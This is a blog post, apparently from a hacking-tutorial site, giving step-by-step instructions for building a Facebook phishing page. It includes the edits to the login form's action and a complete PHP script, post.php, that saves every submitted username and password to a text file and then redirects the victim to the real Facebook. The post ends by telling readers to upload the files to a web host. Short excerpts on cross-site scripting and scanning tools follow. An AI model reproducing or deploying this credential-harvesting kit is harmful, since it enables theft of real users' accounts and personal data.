Skip to main content

What is Facebook Phishing

facebook Phishing

Phishing is the act of fooling a computer user into submitting personal information by creating fake websites that looks like a real (and trusted) sites it is a hacker technique of fishing for password and other secret financial information
Phishing is a type of online identity theft. It uses email and fake website  that are designed to steal your personal data or information such as password, account data, or other information
the facebook phishing page example is given below
Look this is the real facebook page URL but after creating phishing page of the website the website look like same but the URL will change which is redirect the
today we create a facebook phishing page which look similar to a facebook page but it’s not actually a facebook page when victim enter his username and password the phishing page will redirect to the other url
after creating phishing you can see the facebook page look like real facebook page but the url is changed you can see localhost/facebook

steps to create phishing page

step 1:-Go to the Facebook page and then right click on the page, u will see the option view source page,click on that.
step 2:- now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad
step 3:- Now open the notepad and press CTRL+F,and type “ACTION”
step 4:-You will have to find a text which looks like ..
                                       action=https://www.facebook.com/login.php?login_attempt=1
step 5:-delete all the text written in red colour and instead of it write post.php
step 6:-Now save it on your desktop with the name index.htm,not index.html,remember
step 7:-Now your phishing page is ready
step 8:-Open a new notepad and save the given data with the name post.php
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
step 9:-you have two files now one is index.htm and another is post.php,remember file extension is important
step 10:Now u have to upload it in a web hosting site

Comments

Post a Comment

Popular posts from this blog

Cross Site Scripting

Cross Site Scripting XSS is a vulnerability when which present in websites or web applications, allows malicious users (Hackers) to insert their client side code (normally JavaScript) in those web pages. When this malicious code along with the original webpage gets displayed in the web client (browsers like chrome IE, Mozilla etc), and it is allows Hackers to gain greater access of that page.The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site – specifically, impersonate the user Example : in corsss site scrpting we can gether credit card number and private information using a CSS attack. This was achieved by running malicious Javascript code at the victim (client) browser with the access privileges of the web site These are the very limited Javascript priv...
Post a Comment
Read more

Cloud Security and Penetration Testing Services

Cloud Security and Penetration Testing Services What is Cloud, why do We need Cloud Security and Penetration Testing. Cloud services are rapidly increasing popularity in the field of IT, Cloud therefore throws a whole range of unique security concerns into the IT field. These are the common cloud service provider Infrastructure as a Service (Iaas) Platform as a Service (PaaS) Software as a Service(SaaS) Mostly service provider expect that the customer is amenable for implementing security on the services they are providing, Meanwhile customers may believe that security is an included or integral part of the cloud solutions they are purchasing, however this is a completely myth. Since data and services are managed by a third party, Security must be implemented. What security is required for different data, how much security do you need to secure your information, how much security is too much? Cloud Security and Penetration Testing Services Secure against virus, ...
Post a Comment
Read more

Footprinting Scanning

Footprinting Scanning Sam Spade Download Sam Spade from this web site and install it. Sam Spade is a graphical tool which allows you to do DNS interrogation and many other things. See a tutorial here. The features which make Sam Spade a key security tool are: Advanced DNS – DIG tool requests all the DNS records for a host or domain Zone Transfer – ask a DNS server for all it knows about a domain SMTP Relay Check – check whether a mail server allows third party relaying Scan Addresses – scan a range of IP addresses looking for open ports Crawl Web site – search a Web site, looking for email addresses, offsite links, download a Web site Search IP block – finds the IP block for an organization Sam Spade also does whois, traceroute, finger and dns lookup. SuperScan Download SuperScan from its new location and install it. SuperScan allows you to scan a range of IP addresses and do TCP port scanning. It can check all ports, or the ones you select. It is a very fast and p...
Post a Comment
Read more